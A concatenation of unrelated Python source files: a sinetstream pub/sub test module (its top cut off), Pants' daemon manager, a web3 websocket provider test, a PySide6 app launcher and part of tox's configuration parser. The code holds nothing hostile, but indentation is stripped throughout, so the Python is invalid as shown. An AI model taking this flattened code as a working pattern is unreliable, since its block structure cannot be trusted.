from conftest import BROKER, SERVICE, TOPIC, create_config_file
from sinetstream import MessageReader, MessageWriter
logging.basicConfig(level=logging.CRITICAL)
logger = logging.getLogger(__name__)
pytestmark = pytest.mark.usefixtures('setup_config')
text_msgs = [
'test message 001',
'test message 002',
]
ev = Event()
def reader(que, len_msgs, *args, **kwargs):
try:
with MessageReader(*args, **kwargs) as f:
ev.set()
logger.debug("start message reading")
f.seek_to_beginning()
for idx, msg in zip(range(len_msgs), f):
logger.info(f"read message: {msg.raw}")
que.put(msg)
finally:
ev.set()
def writer(msgs, *args, **kwargs):
ev.wait()
logger.debug("start message writing")
with MessageWriter(*args, **kwargs) as f:
for msg in msgs:
logger.info(f"write message: {msg}")
f.publish(msg)
def new_topic():
from random import choices
from string import ascii_letters
return TOPIC + '-' + ''.join(choices(ascii_letters, k=10))
@pytest.fixture()
def pubsub():
q = Queue()
msgs = copy.copy(text_msgs)
topic = new_topic()
reader_params = {
'service': SERVICE,
'topics': topic,
}
writer_params = {
'service': SERVICE,
'topic': topic,
}
yield msgs, reader_params, writer_params
ev.clear()
ths = [
Thread(target=reader, args=(q, len(msgs)), kwargs=reader_params),
Thread(target=writer, args=(msgs, ), kwargs=writer_params),
]
for th in ths:
th.start()
for th in ths:
th.join()
for expected in msgs:
msg = q.get_nowait()
assert msg.topic == topic
assert msg.value == expected
def test_pubsub(pubsub):
msgs, _, _ = pubsub
msgs.clear()
msgs.extend([x.encode() for x in text_msgs])
hdr = b"XXX"
def ser(x):
return hdr + x.encode()
def des(x):
return x[len(hdr):].decode()
def test_pubsub_serdes(pubsub):
_, reader_params, writer_params = pubsub
reader_params.update({'value_deserializer': des})
writer_params.update({'value_serializer': ser})
def test_pubsub_value_type(pubsub):
_, reader_params, writer_params = pubsub
reader_params.update({'value_type': "text"})
writer_params.update({'value_type': "text"})
@pytest.mark.parametrize('config_value_type', ['text'])
def test_pubsub_value_type_config(pubsub):
pass
@pytest.mark.parametrize('config_value_type', ['image'])
def test_pubsub_value_type_config_and_arg(pubsub):
_, reader_params, writer_params = pubsub
reader_params.update({'value_type': "text"})
writer_params.update({'value_type': "text"})
@pytest.fixture(scope='module', autouse=True)
def create_topic():
cwd = Path.cwd().absolute()
with TemporaryDirectory() as work_dir:
try:
os.chdir(str(work_dir))
create_config_file(brokers=[BROKER])
topic = new_topic()
with MessageWriter(SERVICE, topic) as f:
logger.debug(f"create topic: {topic}")
f.publish(b"message 000")
finally:
os.chdir(str(cwd))
|
pants_daemon.py
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import sys
import threading
from contextlib import contextmanager
from setproctitle import setproctitle as set_process_title
from pants.base.build_environment import get_buildroot
from pants.base.exiter import Exiter
from pants.bin.daemon_pants_runner import DaemonExiter, DaemonPantsRunner
from pants.bin.engine_initializer import EngineInitializer
from pants.engine.native import Native
from pants.init.target_roots_calculator import TargetRootsCalculator
from pants.logging.setup import setup_logging
from pants.option.arg_splitter import GLOBAL_SCOPE
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.pantsd.process_manager import FingerprintedProcessManager
from pants.pantsd.service.fs_event_service import FSEventService
from pants.pantsd.service.pailgun_service import PailgunService
from pants.pantsd.service.scheduler_service import SchedulerService
from pants.pantsd.service.store_gc_service import StoreGCService
from pants.pantsd.watchman_launcher import WatchmanLauncher
from pants.util.collections import combined_dict
from pants.util.contextutil import stdio_as
from pants.util.memo import memoized_property
class _LoggerStream(object):
"""A sys.{stdout,stderr} replacement that pipes output to a logger."""
def __init__(self, logger, log_level, handler):
"""
:param logging.Logger logger: The logger instance to emit writes to.
:param int log_level: The log level to use for the given logger.
:param Handler handler: The underlying log handler, for determining the fileno
to support faulthandler logging.
"""
self._logger = logger
self._log_level = log_level
self._handler = handler
def write(self, msg):
for line in msg.rstrip().splitlines():
self._logger.log(self._log_level, line.rstrip())
def flush(self):
return
def isatty(self):
return False
def fileno(self):
return self._handler.stream.fileno()
class PantsDaemon(FingerprintedProcessManager):
"""A daemon that manages PantsService instances."""
JOIN_TIMEOUT_SECONDS = 1
LOG_NAME = 'pantsd.log'
class StartupFailure(Exception):
"""Represents a failure to start pantsd."""
class RuntimeFailure(Exception):
"""Represents a pantsd failure at runtime, usually from an underlying service failure."""
class Factory(object):
@classmethod
def maybe_launch(cls, bootstrap_options=None):
"""Creates and launches a daemon instance if one does not already exist.
:param Options bootstrap_options: The bootstrap options, if available.
:returns: The pailgun port number of the running pantsd instance.
:rtype: int
"""
stub_pantsd = cls.create(bootstrap_options, full_init=False)
with stub_pantsd.lifecycle_lock:
if stub_pantsd.needs_restart(stub_pantsd.options_fingerprint):
# Once we determine we actually need to launch, recreate with full initialization.
pantsd = cls.create(bootstrap_options)
return pantsd.launch()
else:
return stub_pantsd.read_named_socket('pailgun', int)
@classmethod
def create(cls, bootstrap_options=None, full_init=True):
"""
:param Options bootstrap_options: The bootstrap options, if available.
:param bool full_init: Whether or not to fully initialize an engine et al for the purposes
of spawning a new daemon. `full_init=False` is intended primarily
for lightweight lifecycle checks (since there is a ~1s overhead to
initialize the engine). See the impl of `maybe_launch` for an example
of the intended usage.
"""
bootstrap_options = bootstrap_options or cls._parse_bootstrap_options()
bootstrap_options_values = bootstrap_options.for_global_scope()
# TODO: https://github.com/pantsbuild/pants/issues/3479
watchman = WatchmanLauncher.create(bootstrap_options_values).watchman
native = None
build_root = None
services = None
port_map = None
if full_init:
build_root = get_buildroot()
native = Native.create(bootstrap_options_values)
legacy_graph_helper = cls._setup_legacy_graph_helper(native, bootstrap_options_values)
services, port_map = cls._setup_services(
build_root,
bootstrap_options_values,
legacy_graph_helper,
watchman
)
return PantsDaemon(
native=native,
build_root=build_root,
work_dir=bootstrap_options_values.pants_workdir,
log_level=bootstrap_options_values.level.upper(),
services=services,
socket_map=port_map,
metadata_base_dir=bootstrap_options_values.pants_subprocessdir,
bootstrap_options=bootstrap_options
)
@staticmethod
def _parse_bootstrap_options():
return OptionsBootstrapper().get_bootstrap_options()
@staticmethod
def _setup_legacy_graph_helper(native, bootstrap_options):
"""Initializes a `LegacyGraphHelper` instance."""
return EngineInitializer.setup_legacy_graph(
bootstrap_options.pants_ignore,
bootstrap_options.pants_workdir,
bootstrap_options.build_file_imports,
native=native,
build_ignore_patterns=bootstrap_options.build_ignore,
exclude_target_regexps=bootstrap_options.exclude_target_regexp,
subproject_roots=bootstrap_options.subproject_roots,
)
@staticmethod
def _setup_services(build_root, bootstrap_options, legacy_graph_helper, watchman):
"""Initialize pantsd services.
:returns: A tuple of (`tuple` service_instances, `dict` port_map).
"""
fs_event_service = FSEventService(
watchman,
build_root,
bootstrap_options.pantsd_fs_event_workers
)
scheduler_service = SchedulerService(
fs_event_service,
legacy_graph_helper,
build_root,
bootstrap_options.pantsd_invalidation_globs
)
pailgun_service = PailgunService(
bind_addr=(bootstrap_options.pantsd_pailgun_host, bootstrap_options.pantsd_pailgun_port),
exiter_class=DaemonExiter,
runner_class=DaemonPantsRunner,
target_roots_calculator=TargetRootsCalculator,
scheduler_service=scheduler_service
)
store_gc_service = StoreGCService(legacy_graph_helper.scheduler)
return (
# Services.
(fs_event_service, scheduler_service, pailgun_service, store_gc_service),
# Port map.
dict(pailgun=pailgun_service.pailgun_port)
)
def __init__(self, native, build_root, work_dir, log_level, services, socket_map,
metadata_base_dir, bootstrap_options=None):
"""
:param Native native: A `Native` instance.
:param string build_root: The pants build root.
:param string work_dir: The pants work directory.
:param string log_level: The log level to use for daemon logging.
:param string metadata_base_dir: The ProcessManager metadata base dir.
:param Options bootstrap_options: The bootstrap options, if available.
"""
super(PantsDaemon, self).__init__(name='pantsd', metadata_base_dir=metadata_base_dir)
self._native = native
self._build_root = build_root
self._work_dir = work_dir
self._log_level = log_level
self._services = services
self._socket_map = socket_map
self._bootstrap_options = bootstrap_options
self._log_dir = os.path.join(work_dir, self.name)
self._logger = logging.getLogger(__name__)
# A lock to guard the service thread lifecycles. This can be used by individual services
# to safeguard daemon-synchronous sections that should be protected from abrupt teardown.
self._lifecycle_lock = threading.RLock()
# A lock to guard pantsd->runner forks. This can be used by services to safeguard resources
# held by threads at fork time, so that we can fork without deadlocking.
self._fork_lock = threading.RLock()
# N.B. This Event is used as nothing more than a convenient atomic flag - nothing waits on it.
self._kill_switch = threading.Event()
self._exiter = Exiter()
@memoized_property
def watchman_launcher(self):
return WatchmanLauncher.create(self._bootstrap_options.for_global_scope())
@property
def is_killed(self):
return self._kill_switch.is_set()
@property
def options_fingerprint(self):
return OptionsFingerprinter.combined_options_fingerprint_for_scope(
GLOBAL_SCOPE,
self._bootstrap_options,
fingerprint_key='daemon',
invert=True
)
def shutdown(self, service_thread_map):
"""Gracefully terminate all services and kill the main PantsDaemon loop."""
with self._lifecycle_lock:
for service, service_thread in service_thread_map.items():
self._logger.info('terminating pantsd service: {}'.format(service))
service.terminate()
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
self._logger.info('terminating pantsd')
self._kill_switch.set()
@staticmethod
def _close_stdio():
"""Close stdio streams to avoid output in the tty that launched pantsd."""
for fd in (sys.stdin, sys.stdout, sys.stderr):
file_no = fd.fileno()
fd.flush()
fd.close()
os.close(file_no)
@contextmanager
def _pantsd_logging(self):
"""A context manager that runs with pantsd logging.
Asserts that stdio (represented by file handles 0, 1, 2) is closed to ensure that
we can safely reuse those fd numbers.
"""
# Ensure that stdio is closed so that we can safely reuse those file descriptors.
for fd in (0, 1, 2):
try:
os.fdopen(fd)
raise AssertionError(
'pantsd logging cannot initialize while stdio is open: {}'.format(fd))
except OSError:
pass
# Redirect stdio to /dev/null for the rest of the run, to reserve those file descriptors
# for further forks.
with stdio_as(stdin_fd=-1, stdout_fd=-1, stderr_fd=-1):
# Reinitialize logging for the daemon context.
result = setup_logging(self._log_level, log_dir=self._log_dir, log_name=self.LOG_NAME)
# Do a python-level redirect of stdout/stderr, which will not disturb `0,1,2`.
# TODO: Consider giving these pipes/actual fds, in order to make them "deep" replacements
# for `1,2`, and allow them to be used via `stdio_as`.
sys.stdout = _LoggerStream(logging.getLogger(), logging.INFO, result.log_handler)
sys.stderr = _LoggerStream(logging.getLogger(), logging.WARN, result.log_handler)
self._logger.debug('logging initialized')
yield result.log_handler.stream
def _setup_services(self, services):
assert self._lifecycle_lock is not None, 'PantsDaemon lock has not been set!'
assert self._fork_lock is not None, 'PantsDaemon fork lock has not been set!'
for service in services:
self._logger.info('setting up service {}'.format(service))
service.setup(self._lifecycle_lock, self._fork_lock)
@staticmethod
def _make_thread(target):
t = threading.Thread(target=target)
t.daemon = True
return t
def _run_services(self, services):
"""Service runner main loop."""
if not services:
self._logger.critical('no services to run, bailing!')
return
service_thread_map = {service: self._make_thread(service.run) for service in services}
# Start services.
for service, service_thread in service_thread_map.items():
self._logger.info('starting service {}'.format(service))
try:
service_thread.start()
except (RuntimeError, service.ServiceError):
self.shutdown(service_thread_map)
raise self.StartupFailure('service {} failed to start, shutting down!'.format(service))
# Once all services are started, write our pid.
self.write_pid()
self.write_metadata_by_name('pantsd', self.FINGERPRINT_KEY, self.options_fingerprint)
# Monitor services.
while not self.is_killed:
for service, service_thread in service_thread_map.items():
if not service_thread.is_alive():
self.shutdown(service_thread_map)
raise self.RuntimeFailure('service failure for {}, shutting down!'.format(service))
else:
# Avoid excessive CPU utilization.
service_thread.join(self.JOIN_TIMEOUT_SECONDS)
def _write_named_sockets(self, socket_map):
"""Write multiple named sockets using a socket mapping."""
for socket_name, socket_info in socket_map.items():
self.write_named_socket(socket_name, socket_info)
def run_sync(self):
"""Synchronously run pantsd."""
# Switch log output to the daemon's log stream from here forward.
self._close_stdio()
with self._pantsd_logging() as log_stream:
self._exiter.set_except_hook(log_stream)
self._logger.info('pantsd starting, log level is {}'.format(self._log_level))
self._native.set_panic_handler()
# Set the process name in ps output to 'pantsd' vs './pants compile src/etc:: -ldebug'.
set_process_title('pantsd [{}]'.format(self._build_root))
# Write service socket information to .pids.
self._write_named_sockets(self._socket_map)
# Enter the main service runner loop.
self._setup_services(self._services)
self._run_services(self._services)
def post_fork_child(self):
"""Post-fork() child callback for ProcessManager.daemon_spawn()."""
entry_point = '{}:launch'.format(__name__)
exec_env = combined_dict(os.environ, dict(PANTS_ENTRYPOINT=entry_point))
# Pass all of sys.argv so that we can proxy arg flags e.g. `-ldebug`.
cmd = [sys.executable] + sys.argv
self._logger.debug('cmd is: PANTS_ENTRYPOINT={} {}'.format(entry_point, ' '.join(cmd)))
# TODO: Improve error handling on launch failures.
os.spawnve(os.P_NOWAIT, sys.executable, cmd, env=exec_env)
def needs_launch(self):
"""Determines if pantsd needs to be launched.
N.B. This should always be called under care of `self.lifecycle_lock`.
:returns: True if the daemon needs launching, False otherwise.
:rtype: bool
"""
new_fingerprint = self.options_fingerprint
self._logger.debug('pantsd: is_alive={} new_fingerprint={} current_fingerprint={}'
.format(self.is_alive(), new_fingerprint, self.fingerprint))
return self.needs_restart(new_fingerprint)
def launch(self):
"""Launches pantsd in a subprocess.
N.B. This should always be called under care of `self.lifecycle_lock`.
:returns: The port that pantsd is listening on.
:rtype: int
"""
self.terminate(include_watchman=False)
self.watchman_launcher.maybe_launch()
self._logger.debug('launching pantsd')
self.daemon_spawn()
# Wait up to 60 seconds for pantsd to write its pidfile.
self.await_pid(60)
listening_port = self.read_named_socket('pailgun', int)
self._logger.debug('pantsd is running at pid {}, pailgun port is {}'
.format(self.pid, listening_port))
return listening_port
def terminate(self, include_watchman=True):
"""Terminates pantsd and watchman."""
with self.lifecycle_lock:
super(PantsDaemon, self).terminate()
if include_watchman:
self.watchman_launcher.terminate()
def launch():
"""An external entrypoint that spawns a new pantsd instance."""
PantsDaemon.Factory.create().run_sync()
|
test_websocket_provider.py
|
import asyncio
import pytest
import sys
from threading import (
Thread,
)
import websockets
from tests.utils import (
wait_for_ws,
)
from web3 import Web3
from web3.exceptions import (
ValidationError,
)
from web3.providers.websocket import (
WebsocketProvider,
)
if sys.version_info >= (3, 8):
from asyncio.exceptions import (
TimeoutError,
)
else:
from concurrent.futures import (
TimeoutError,
)
@pytest.fixture
def start_websocket_server(open_port):
event_loop = asyncio.new_event_loop()
def run_server():
async def empty_server(websocket, path):
data = await websocket.recv()
await asyncio.sleep(0.02)
await websocket.send(data)
asyncio.set_event_loop(event_loop)
server = websockets.serve(empty_server, '127.0.0.1', open_port)
event_loop.run_until_complete(server)
event_loop.run_forever()
thd = Thread(target=run_server)
thd.start()
try:
yield
finally:
event_loop.call_soon_threadsafe(event_loop.stop)
@pytest.fixture
def w3(open_port, start_websocket_server):
# need new event loop as the one used by server is already running
event_loop = asyncio.new_event_loop()
endpoint_uri = 'ws://127.0.0.1:{}'.format(open_port)
event_loop.run_until_complete(wait_for_ws(endpoint_uri))
provider = WebsocketProvider(endpoint_uri, websocket_timeout=0.01)
return Web3(provider)
def test_websocket_provider_timeout(w3):
with pytest.raises(TimeoutError):
w3.eth.accounts
def test_restricted_websocket_kwargs():
invalid_kwargs = {'uri': 'ws://127.0.0.1:8546'}
re_exc_message = r'.*found: {0}*'.format(set(invalid_kwargs.keys()))
with pytest.raises(ValidationError, match=re_exc_message):
WebsocketProvider(websocket_kwargs=invalid_kwargs)
|
app.py
|
from PySide6.QtCore import QFile, QTextStream
from PySide6.QtWidgets import QApplication, QWidget
import sys
import threading
from extension.utils import get_tools
from peewee import *
get_tools()
from file_cabinet.models import Drawer
app = QApplication(sys.argv)
from main.ui import MainWindow
from main.settings import tool
window = MainWindow()
window.show()
from upd.conf import settings
rendered = open("stylesheet/normal.qss", "r").read().format(**settings.to_dict())
app.setStyleSheet(rendered)
t = threading.Thread(target=window.load)
t.start()
sys.exit(app.exec())
|
__init__.py
|
from __future__ import print_function
import argparse
import itertools
import os
import random
import re
import shlex
import string
import sys
import traceback
import warnings
from collections import OrderedDict
from fnmatch import fnmatchcase
from subprocess import list2cmdline
from threading import Thread
import pluggy
import py
import toml
from packaging import requirements
from packaging.utils import canonicalize_name
import tox
from tox.constants import INFO
from tox.exception import MissingDependency
from tox.interpreters import Interpreters, NoInterpreterInfo
from tox.reporter import (
REPORTER_TIMESTAMP_ON_ENV,
error,
update_default_reporter,
using,
verbosity1,
)
from tox.util.path import ensure_empty_dir
from tox.util.stdlib import importlib_metadata
from .parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from .parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from .parallel import add_parallel_config, add_parallel_flags
from .reporter import add_verbosity_commands
try:
from shlex import quote as shlex_quote
except ImportError:
from pipes import quote as shlex_quote
hookimpl = tox.hookimpl
"""DEPRECATED - REMOVE - left for compatibility with plugins importing from here.
Import hookimpl directly from tox instead.
"""
WITHIN_PROVISION = os.environ.get(str("TOX_PROVISION")) == "1"
INTERRUPT_TIMEOUT = 0.3
TERMINATE_TIMEOUT = 0.2
def get_plugin_manager(plugins=()):
# initialize plugin manager
import tox.venv
pm = pluggy.PluginManager("tox")
pm.add_hookspecs(tox.hookspecs)
pm.register(tox.config)
pm.register(tox.interpreters)
pm.register(tox.venv)
pm.register(tox.session)
from tox import package
pm.register(package)
pm.load_setuptools_entrypoints("tox")
for plugin in plugins:
pm.register(plugin)
pm.check_pending()
return pm
class Parser:
"""Command line and ini-parser control object."""
def __init__(self):
class HelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(HelpFormatter, self).__init__(prog, max_help_position=35, width=190)
self.argparser = argparse.ArgumentParser(
description="tox options", add_help=False, prog="tox", formatter_class=HelpFormatter
)
self._testenv_attr = []
def add_argument(self, *args, **kwargs):
""" add argument to command line parser. This takes the
same arguments that ``argparse.ArgumentParser.add_argument``.
"""
return self.argparser.add_argument(*args, **kwargs)
def add_testenv_attribute(self, name, type, help, default=None, postprocess=None):
""" add an ini-file variable for "testenv" section.
Types are specified as strings like "bool", "line-list", "string", "argv", "path",
"argvlist".
The ``postprocess`` function will be called for each testenv
like ``postprocess(testenv_config=testenv_config, value=value)``
where ``value`` is the value as read from the ini (or the default value)
and ``testenv_config`` is a :py:class:`tox.config.TestenvConfig` instance
which will receive all ini-variables as object attributes.
Any postprocess function must return a value which will then be set
as the final value in the testenv section.
"""
self._testenv_attr.append(VenvAttribute(name, type, default, help, postprocess))
def add_testenv_attribute_obj(self, obj):
""" add an ini-file variable as an object.
This works as the ``add_testenv_attribute`` function but expects
"name", "type", "help", and "postprocess" attributes on the object.
"""
assert hasattr(obj, "name")
assert hasattr(obj, "type")
assert hasattr(obj, "help")
assert hasattr(obj, "postprocess")
self._testenv_attr.append(obj)
def parse_cli(self, args, strict=False):
args, argv = self.argparser.parse_known_args(args)
if argv and (strict or WITHIN_PROVISION):
self.argparser.error("unrecognized arguments: {}".format(" ".join(argv)))
return args
def _format_help(self):
return self.argparser.format_help()
class VenvAttribute:
def __init__(self, name, type, default, help, postprocess):
self.name = name
self.type = type
self.default = default
self.help = help
self.postprocess = postprocess
class DepOption:
name = "deps"
type = "line-list"
help = "each line specifies a dependency in pip/setuptools format."
default = ()
def postprocess(self, testenv_config, value):
deps = []
config = testenv_config.config
for depline in value:
m = re.match(r":(\w+):\s*(\S+)", depline)
if m:
iname, name = m.groups()
ixserver = config.indexserver[iname]
else:
name = depline.strip()
ixserver = None
# we need to process options, in case they contain a space,
# as the subprocess call to pip install will otherwise fail.
# in case of a short option, we remove the space
for option in tox.PIP.INSTALL_SHORT_OPTIONS_ARGUMENT:
if name.startswith(option):
name = "{}{}".format(option, name[len(option) :].strip())
# in case of a long option, we add an equal sign
for option in tox.PIP.INSTALL_LONG_OPTIONS_ARGUMENT:
name_start = "{} ".format(option)
if name.startswith(name_start):
name = "{}={}".format(option, name[len(option) :].strip())
name = self._cut_off_dep_comment(name)
name = self._replace_forced_dep(name, config)
deps.append(DepConfig(name, ixserver))
return deps
def _replace_forced_dep(self, name, config):
"""Override given dependency config name. Take ``--force-dep-version`` option into account.
:param name: dep config, for example ["pkg==1.0", "other==2.0"].
:param config: ``Config`` instance
:return: the new dependency that should be used for virtual environments
"""
if not config.option.force_dep:
return name
for forced_dep in config.option.force_dep:
if self._is_same_dep(forced_dep, name):
return forced_dep
return name
@staticmethod
def _cut_off_dep_comment(name):
return re.sub(r"\s+#.*", "", name).strip()
@classmethod
def _is_same_dep(cls, dep1, dep2):
"""Definitions are the same if they refer to the same package, even if versions differ."""
dep1_name = canonicalize_name(requirements.Requirement(dep1).name)
try:
dep2_name = canonicalize_name(requirements.Requirement(dep2).name)
except requirements.InvalidRequirement:
# we couldn't parse a version, probably a URL
return False
return dep1_name == dep2_name
class PosargsOption:
name = "args_are_paths"
type = "bool"
default = True
help = "treat positional args in commands as paths"
def postprocess(self, testenv_config, value):
config = testenv_config.config
args = config.option.args
if args:
if value:
args = []
for arg in config.option.args:
if arg and not os.path.isabs(arg):
origpath = os.path.join(config.invocationcwd.strpath, arg)
if os.path.exists(origpath):
arg = os.path.relpath(origpath, testenv_config.changedir.strpath)
args.append(arg)
testenv_config._reader.addsubstitutions(args)
return value
class InstallcmdOption:
name = "install_command"
type = "argv"
default = "python -m pip install {opts} {packages}"
help = "install command for dependencies and package under test."
def postprocess(self, testenv_config, value):
if "{packages}" not in value:
raise tox.exception.ConfigError(
"'install_command' must contain '{packages}' substitution"
)
return value
def parseconfig(args, plugins=()):
"""Parse the configuration file and create a Config object.
:param plugins:
:param list[str] args: list of arguments.
:rtype: :class:`Config`
:raise SystemExit: toxinit file is not found
"""
pm = get_plugin_manager(plugins)
config, option = parse_cli(args, pm)
update_default_reporter(config.option.quiet_level, config.option.verbose_level)
for config_file in propose_configs(option.configfile):
config_type = config_file.basename
content = None
if config_type == "pyproject.toml":
toml_content = get_py_project_toml(config_file)
try:
content = toml_content["tool"]["tox"]["legacy_tox_ini"]
except KeyError:
continue
ParseIni(config, config_file, content)
pm.hook.tox_configure(config=config) # post process config object
break
else:
if option.help or option.helpini:
return config
msg = "tox config file (either {}) not found"
candidates = ", ".join(INFO.CONFIG_CANDIDATES)
feedback(msg.format(candidates), sysexit=not (option.help or option.helpini))
return config
def get_py_project_toml(path):
with open(str(path)) as file_handler:
config_data = toml.load(file_handler)
return config_data
def propose_configs(cli_config_file):
from_folder = py.path.local()
if cli_config_file is not None:
if os.path.isfile(cli_config_file):
yield py.path.local(cli_config_file)
return
if os.path.isdir(cli_config_file):
from_folder = py.path.local(cli_config_file)
else:
print(
"ERROR: {} is neither file or directory".format(cli_config_file), file=sys.stderr
)
return
for basename in INFO.CONFIG_CANDIDATES:
if from_folder.join(basename).isfile():
yield from_folder.join(basename)
for path in from_folder.parts(reverse=True):
ini_path = path.join(basename)
if ini_path.check():
yield ini_path
def parse_cli(args, pm):
parser = Parser()
pm.hook.tox_addoption(parser=parser)
option = parser.parse_cli(args)
if option.version:
print(get_version_info(pm))
raise SystemExit(0)
interpreters = Interpreters(hook=pm.hook)
config = Config(
pluginmanager=pm, option=option, interpreters=interpreters, parser=parser, args=args
)
return config, option
def feedback(msg, sysexit=False):
print("ERROR: {}".format(msg), file=sys.stderr)
if sysexit:
raise SystemExit(1)
def get_version_info(pm):
out = ["{} imported from {}".format(tox.__version__, tox.__file__)]
plugin_dist_info = pm.list_plugin_distinfo()
if plugin_dist_info:
out.append("registered plugins:")
for mod, egg_info in plugin_dist_info:
source = getattr(mod, "__file__", repr(mod))
out.append(" {}-{} at {}".format(egg_info.project_name, egg_info.version, source))
return "\n".join(out)
class SetenvDict(object):
_DUMMY = object()
def __init__(self, definitions, reader):
self.definitions = definitions
self.reader = reader
self.resolved = {}
self._lookupstack = []
def __repr__(self):
return "{}: {}".format(self.__class__.__name__, self.definitions)
def __contains__(self, name):
return name in self.definitions
def get(self, name, default=None):
try:
return self.resolved[name]
except KeyError:
try:
if name in self._lookupstack:
raise KeyError(name)
val = self.definitions[name]
except KeyError:
return os.environ.get(name, default)
self._lookupstack.append(name)
try:
self.resolved[name] = res = self.reader._replace(val)
finally:
self._lookupstack.pop()
return res
def __getitem__(self, name):
x = self.get(name, self._DUMMY)
if x is self._DUMMY:
raise KeyError(name)
return x
def keys(self):
return self.definitions.keys()
def __setitem__(self, name, value):
self.definitions[name] = value
self.resolved[name] = value
@tox.hookimpl
def tox_addoption(parser):
parser.add_argument(
"--version", action="store_true", help="report version information to stdout."
)
parser.add_argument("-h", "--help", action="store_true", help="show help about options")
parser.add_argument(
"--help-ini", "--hi", action="store_true", dest="helpini", help="show help about ini-names"
)
add_verbosity_commands(parser)
parser.add_argument(
"--showconfig",
action="store_true",
help="show live configuration (by default all env, with -l only default targets,"
" specific via TOXENV/-e)",
)
parser.add_argument(
"-l",
"--listenvs",
action="store_true",
help="show list of test environments (with description if verbose)",
)
parser.add_argument(
"-a",
"--listenvs-all",
action="store_true",
help="show list of all defined environments (with description if verbose)",
)
parser.add_argument(
"-c", dest="configfile", help="config file name or directory with 'tox.ini' file."
)
parser.add_argument(
"-e",
action="append",
dest="env",
metavar="envlist",
help="work against specified environments (ALL selects all).",
)
parser.add_argument(
"--devenv",
metavar="ENVDIR",
help=(
"sets up a development environment at ENVDIR based on the env's tox "
"configuration specified by `-e` (-e defaults to py)."
),
)
parser.add_argument("--notest", action="store_true", help="skip invoking test commands.")
parser.add_argument(
"--sdistonly", action="store_true", help="only perform the sdist packaging activity."
)
add_parallel_flags(parser)
parser.add_argument(
"--parallel--safe-build",
action="store_true",
dest="parallel_safe_build",
help="(deprecated) ensure two tox builds can run in parallel "
"(uses a lock file in the tox workdir with .lock extension)",
)
parser.add_argument(
"--installpkg",
metavar="PATH",
help="use specified package for installation into venv, instead of creating an sdist.",
)
parser.add_argument(
"--develop",
action="store_true",
help="install package in the venv using 'setup.py develop' via 'pip -e .'",
)
parser.add_argument(
"-i",
"--index-url",
action="append",
dest="indexurl",
metavar="URL",
help="set indexserver url (if URL is of form name=url set the "
"url for the 'name' indexserver, specifically)",
)
parser.add_argument(
"--pre",
action="store_true",
help="install pre-releases and development versions of dependencies. "
"This will pass the --pre option to install_command "
"(pip by default).",
)
parser.add_argument(
"-r", "--recreate", action="store_true", help="force recreation of virtual environments"
)
parser.add_argument(
"--result-json",
dest="resultjson",
metavar="PATH",
help="write a json file with detailed information "
"about all commands and results involved.",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="PATH",
help="for python discovery first try the python executables under these paths",
default=[],
)
# We choose 1 to 4294967295 because it is the range of PYTHONHASHSEED.
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. "
"Defaults to a random integer in the range [1, 4294967295] "
"([1, 1024] on Windows). "
"Passing 'noset' suppresses this behavior.",
)
parser.add_argument(
"--force-dep",
action="append",
metavar="REQ",
help="Forces a certain version of one of the dependencies "
"when configuring the virtual environment. REQ Examples "
"'pytest<2.7' or 'django>=1.6'.",
)
parser.add_argument(
"--sitepackages",
action="store_true",
help="override sitepackages setting to True in all envs",
)
parser.add_argument(
"--alwayscopy", action="store_true", help="override alwayscopy setting to True in all envs"
)
cli_skip_missing_interpreter(parser)
parser.add_argument("--workdir", metavar="PATH", help="tox working directory")
parser.add_argument(
"args", nargs="*", help="additional arguments available to command positional substitution"
)
def _set_envdir_from_devenv(testenv_config, value):
if testenv_config.config.option.devenv is not None:
return py.path.local(testenv_config.config.option.devenv)
else:
return value
parser.add_testenv_attribute(
name="envdir",
type="path",
default="{toxworkdir}/{envname}",
help="set venv directory -- be very careful when changing this as tox "
"will remove this directory when recreating an environment",
postprocess=_set_envdir_from_devenv,
)
# add various core venv interpreter attributes
def setenv(testenv_config, value):
setenv = value
config = testenv_config.config
if "PYTHONHASHSEED" not in setenv and config.hashseed is not None:
setenv["PYTHONHASHSEED"] = config.hashseed
setenv["TOX_ENV_NAME"] = str(testenv_config.envname)
setenv["TOX_ENV_DIR"] = str(testenv_config.envdir)
return setenv
parser.add_testenv_attribute(
name="setenv",
type="dict_setenv",
postprocess=setenv,
help="list of X=Y lines with environment variable settings",
)
def basepython_default(testenv_config, value):
"""either user set or proposed from the factor name
in both cases we check that the factor name implied python version and the resolved
python interpreter version match up; if they don't we warn, unless ignore base
python conflict is set in which case the factor name implied version if forced
"""
for factor in testenv_config.factors:
match = tox.PYTHON.PY_FACTORS_RE.match(factor)
if match:
base_exe = {"py": "python"}.get(match.group(1), match.group(1))
version_s = match.group(2)
if not version_s:
version_info = ()
elif len(version_s) == 1:
version_info = (version_s,)
else:
version_info = (version_s[0], version_s[1:])
implied_version = ".".join(version_info)
implied_python = "{}{}".format(base_exe, implied_version)
break
else:
implied_python, version_info, implied_version = None, (), ""
if testenv_config.config.ignore_basepython_conflict and implied_python is not None:
return implied_python
proposed_python = (implied_python or sys.executable) if value is None else str(value)
if implied_python is not None and implied_python != proposed_python:
testenv_config.basepython = proposed_python
python_info_for_proposed = testenv_config.python_info
if not isinstance(python_info_for_proposed, NoInterpreterInfo):
proposed_version = ".".join(
str(x) for x in python_info_for_proposed.version_info[: len(version_info)]
)
if proposed_version != implied_version:
# TODO(stephenfin): Raise an exception here in tox 4.0
warnings.warn(
"conflicting basepython version (set {}, should be {}) for env '{}';"
"resolve conflict or set ignore_basepython_conflict".format(
proposed_version, implied_version, testenv_config.envname
)
)
return proposed_python
parser.add_testenv_attribute(
name="basepython",
type="basepython",
default=None,
postprocess=basepython_default,
help="executable name or path of interpreter used to create a virtual test environment.",
)
def merge_description(testenv_config, value):
"""the reader by default joins generated description with new line,
replace new line with space"""
return value.replace("\n", " ")
